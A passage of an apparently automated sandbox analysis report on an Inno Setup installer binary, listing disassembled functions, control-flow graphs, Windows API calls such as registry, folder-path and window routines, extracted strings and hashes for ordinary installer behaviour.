                                                              control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1687 468e84 1668->1687 1671 468e94-468eb9 call 42dd4c * 2 1669->1671 1672 468eeb-468ef2 1669->1672 1694 468ebb-468ec4 call 4314f8 1671->1694 1695 468ec9-468edb call 42dd4c 1671->1695 1674 468ef4-468f06 call 42dd4c 1672->1674 1675 468f38-468f3f 1672->1675 1688 468f16-468f28 call 42dd4c 1674->1688 1689 468f08-468f11 call 4314f8 1674->1689 1677 468f41-468f75 call 42dd4c * 3 1675->1677 1678 468f7a-468f90 RegCloseKey 1675->1678 1677->1678 1687->1669 1688->1675 1702 468f2a-468f33 call 4314f8 1688->1702 1689->1688 1694->1695 1695->1672 1703 468edd-468ee6 call 4314f8 1695->1703 1702->1675 1703->1672
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                              Strings
                                                              • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                              • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                              • Inno Setup: Icon Group, xrefs: 00468E66
                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                              • Inno Setup: App Path, xrefs: 00468E4A
                                                              • %s\%s_is1, xrefs: 00468E05
                                                              • Inno Setup: Selected Components, xrefs: 00468EAA
                                                              • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                              • Inno Setup: User Info: Name, xrefs: 00468F47
                                                              • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                              • Inno Setup: Setup Type, xrefs: 00468E9A
                                                              • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                              • Inno Setup: No Icons, xrefs: 00468E73
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                              • API String ID: 47109696-1093091907
                                                              • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                              • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                              • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                              • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59
                                                              Function 0047C66C Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 187COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                              • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                              • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                              • API String ID: 3771764029-544719455
                                                              • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                              • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                              • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                              • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D
                                                              Function 00423874 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1959 4238f1 1958->1959 1960 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1960 1959->1960 1972 423952-423965 call 424178 SendMessageA 1960->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1960->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                              APIs
                                                                • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                              • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                              • RegisterClassA.USER32(00499630), ref: 004238B7
                                                              • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                              • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                              • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                              • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                              • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                              • String ID: |6B
                                                              • API String ID: 183575631-3009739247
                                                              • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                              • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                              • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                              • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D
                                                              Function 0047CE78 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1998 47cefb-47cf01 1994->1998 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1998->1991 1998->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                              APIs
                                                              • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                              • API String ID: 190572456-256906917
                                                              • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                              • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                              • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                              • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D
                                                              Function 0040631C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                              • API String ID: 3256987805-3653653586
                                                              • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                              • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                              • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                              • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                              Function 0041321B Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 633COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$Prop
                                                              • String ID: 3A$yA
                                                              • API String ID: 3887896539-3278460822
                                                              • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                              • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                              • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                              • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A
                                                              Function 00467180 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2931 4672b6 2909->2931 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2929 46730a-467311 2919->2929 2929->2920 2933 467313-467338 ExtractIconA call 4670c0 2929->2933 2931->2920 2933->2920
                                                              APIs
                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                              • String ID: c:\directory$shell32.dll$%H
                                                              • API String ID: 3376378930-166502273
                                                              • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                              • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                              • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                              • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                              Function 0042F560 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 0042F58F
                                                              • GetFocus.USER32 ref: 0042F597
                                                              • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                              • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                              • String ID: TWindowDisabler-Window
                                                              • API String ID: 3167913817-1824977358
                                                              • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                              • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                              • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                              • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                              Function 004531F0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                              • API String ID: 1646373207-2130885113
                                                              • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                              • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                              • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                              • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                              Function 00430940 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                              • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                              • API String ID: 4130936913-2943970505
                                                              • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                              • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                              • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                              • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                              Function 00455010 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
